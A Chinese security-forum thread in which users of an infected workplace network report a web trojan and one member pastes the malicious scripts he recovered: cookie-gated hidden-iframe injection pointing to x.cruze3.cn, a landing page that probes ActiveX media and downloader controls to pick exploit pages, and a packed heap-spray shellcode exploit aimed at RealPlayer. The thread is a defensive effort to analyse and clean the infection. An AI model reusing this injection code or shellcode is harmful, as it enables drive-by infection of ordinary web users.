瑞星卡卡安全论坛

病毒名称是html：script-inf

只要一上网就跳出来，杀不掉，QQ可以用，其他一样都不能用

系统重装一连网就中，不知道怎么办

请瑞星工程师看看，整个单位网络都是这样

不是内网的，我们是上外网的，连天网硬件防火墙都抵不
 附件: 您所在的用户组无法下载或查看附件了

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MAXTHON 2.0)

清空IE缓存，再查杀看一下，

也可将此文件通过附件方式上传。

楼上说的方式是没有用的，我使用的是avast来查杀的，我现在说说目前的进展
我们这里整个网络都已经感染这个病毒，严重堵塞网络。
首先我使用goole浏览器访问任何一个网页，都提示有危险，得到来自的危险网站为http://x.cruze3.cn/，改用IE访问这个地址，页面显示“
Directory Listing DeniedThis Virtual Directory does not allow contents to be listed.”
查看原文件，如下
document.writeln("<script>");
document.writeln("function oK_Begin(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
document.writeln("document.write(\'<iframe width=0 height=0 src=\"http://x.cruze3.cn/gg.htm\"><\/iframe>\');");
document.writeln("}");
document.writeln("}");
document.writeln("oK_Begin();");
document.writeln("<\/script>");
document.writeln("<script>window.onerror=function(){return true;}<\/script>")
请注意上面红色标记出来的地方，他将本地浏览器的临时文件夹中的COOKIE信息改了，根据我的猜测，他是将本地所有访问过的网页的cookie都做了修改，只要你再访问这些地址就在页面中嵌入一个iframe，地址为http://x.cruze3.cn/gg.htm
打开这个地址，在打开的过程中，一个窗口一闪而过，这个一会再说，我们现在看看这个页面中有什么信息,如下：
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
光从上面的信息看不出什么问题，我们继续查看源文件，得到如下信息
<script>
document.write("<iframe width=100 height=0 src=flash.htm></iframe>");
document.write("<iframe width=100 height=0 src=as.htm></iframe>");
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=20 height=0 src=14.htm></iframe>");
document.write("<iframe width=100 height=0 src=053.htm></iframe>");
document.write("<iframe width=100 height=0 src=as.htm></iframe>");
try{var f;
var gg=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};                     
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=lz.htm></iframe>");}}
try{var m;
var hh=new ActiveXObject("Downloader.DLoader.1");}
catch(m){};                     
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=sina.htm></iframe>");}}
try{var n;
var ll=new ActiveXObject("MP"+"S.S"+"tor"+"mPl"+"ayer");}
catch(n){};                     
finally{if(n!="[object Error]"){document.write("<iframe width=100 height=0 src=bf.htm></iframe>");}}
try{var b;
var mm=new ActiveXObject("DPClient.Vod");}
catch(b){};                     
finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=Thunder.htm></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="6.0.14.552")
document.write("<iframe width=100 height=0 src=re10.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=re11.htm></iframe>");
}
test();
</script>
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/698372/ystat.js"></script><noscript><a href="http://tongji.cn.yahoo.com"><img src="http://img.tongji.cn.yahoo.com/698372/ystat.gif"/></a></noscript>

eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee

我们可以看到，他连接的js是yahoo的统计分析的一段脚本，下载这个脚本后发现里面有一个IP地址58.221.37.140，这个不管他，我们先看上面的文件
红色标记出来的一个页面，我打开http://x.cruze3.cn/re11.htm后发现页面上就一个没显示出来的图片，源文件如下：
<object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="obj">
 
</object>
<script language="JavaScript">
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('63 23(){1 13=15(""+"%62"+"%64"+"%65"+"%66"+"%61"+"%60"+"%55"+"%54"+"%56"+"%57"+"%59"+"%21"+"%58"+"%67"+"%68"+"%78"+"%77"+"%79"+"%80"+"%53"+"%76"+"%75"+"%70"+"%69"+"%71"+"%72"+"%74"+"%73"+"%82"+"%45"+"%35"+"%36"+"%37"+"%33"+"%31"+"%27"+"%26"+"%28"+"%29"+"%30"+"%38"+"%48"+"%50"+"%51"+"%47"+"%42"+"%43"+"%16"+"%52"+"%44"+"%41"+"%46"+"%49"+"%16"+"%40"+"%39"+"%16"+"%34"+"%81"+"%92"+"%120"+"%119"+"%8"+"%121"+"%122"+"%123"+"%118"+"%117"+"%113"+"%112"+"%114"+"%115"+"%8"+"%83"+"%125"+"%124"+"%131"+"%21"+"%134"+"%133"+"%136"+"%18"+"%137"+"%135"+"%132"+"%127"+"%8"+"%126"+"%128"+"%129"+"%130"+"%18"+"%116"+"%110"+"%111"+"%91"+"%8"+"%93"+"%94"+"%95"+"%8"+"%90%89%85%84%86%22%87%88%22%96%97%106%105%107%108%109");1 2=15(""+"%19"+"%19");1 17=20;1 9=17+13.7;14(2.7<9)2+=2;1 25=2.24(0,9);1 3=2.24(0,2.7-9);14(3.7+9<104)3=3+3+25;1 103=12;1 12=99 98();100(10=0;10<101;10++){12[10]=3+13}1 4=\'\';14(4.7<32)4=4+15("%102");1 11=6.5;6.5=4;6.5=11;11=6.5;6.5=4;6.5=11}{23()}',10,138,'|var|gamewm|block|buf|Console|obj|length|uFFFF|fukcyourising|i|good_flow|yumen|gameaaaabbbbaaa|while|unescape|u408B|xxxyoukaspersky|uD0FF|u0C0C||uDB33|u2e70|game|substring|fillblock|u642E|u6E6F|u6C6C|u4300|u5C3A|u6D6C||u7275|u953C|u048B|u038B|uC3C5|u2e55|u7C40|u8D34|u8BAD|u3040|u0C78|u1C70|uDD03|u0840|u0364|u7865|u09EB|u0065|uC033|u8B0C|uEB40|u0320|u768B|u33F5|u49C9|u0F36|uAD41|u56F5|u0378|u54EB|function|u758B|u8B3C|u3574|u14BE|u3828|u5E8B|u5EE7|u0324|u66DD|u8B4B|u0C8B|u75DF|u3BEF|uC108|u74F2|u0DCB|uDA03|u8EBF|u1C5E|u8BFF|u732f|u2f3a|u6f68|u786d|u6f70|u7074|u7468|uFF40|u0E4E|uFF52|uE8D0|uFFD7|u6e69|u6f66|Array|new|for|300|0C|test99|0x40000|u7070|u612f|u652e|u6578|u0000|uE2D8|uE873|u1A36|uBF50|u702F|u6FE8|u7EBF|u95D0|uFF3C|uFF84|uE8EC|uEC83|u8304|u242C|u8DFC|u2454|u83FF|u53E8|u04EC|u2C83|u6224|uBA52|u0E8A|uEB52|u5353|uFE98|u5324|uBF5D'.split('|'),0,{}))
</script>
到这里就告一段落了，我正在分析这些代码是干什么用的，是否被加密==，如果有新进展会立刻告知大家，如果大家有什么新的发现也可以继续跟帖，大家一起研究
-----------------------------------
-----------------------------------
请注意上面蓝色加粗的部分，因为后面的代码是加密过的，所以我注意到了上面的object部分，查看他的ID，原来是RealPlayer 11 Beta RealPlayer 10.5 的木马，其他的几个还没有分析，大家继续，现在我只知道他的危害，具体怎么杀还再继续研究

那到底能不能杀呀

瑞星的高工们，请帮帮忙

我们单位网络严重赌赛了，网页一打开就中毒，唉

我只是个人研究，目前他的机制已经了解，是一个网页木马，目前没想到有什么好的方法杀掉，只能防范，到今天早上位置很多杀毒软件都可以防住，包括卡巴、瑞星、avast等。他的潜伏时间是一天，所以想要将一个局域网内的病毒都杀掉的话，必须将整个网络都断掉，逐台机器杀，现在在继续研究，有新的消息我会及时发帖

请上传报毒文件或可疑文件。

我这里没法保存可疑文件，他是在浏览器的临时文件夹下面生成类似http://www.qq[1].com这样的文件，其他的如我上面写的东西，请你们帮忙分析，是否能够出来个专杀工具

您好，楼主在一楼的图片中，有报毒文件，

请按照所提示路径上传该文件，

恶意网站您也可以通过卡卡网的恶意网站上报，进行上报：http://tool.ikaka.com/report.asp

局域网内的arp攻击，找不到源头当然没法杀

hxxp://shop.mxpop.info/app.exe

开启瑞星或360的ARP所有的机器然后找源头。顺便上报呵呵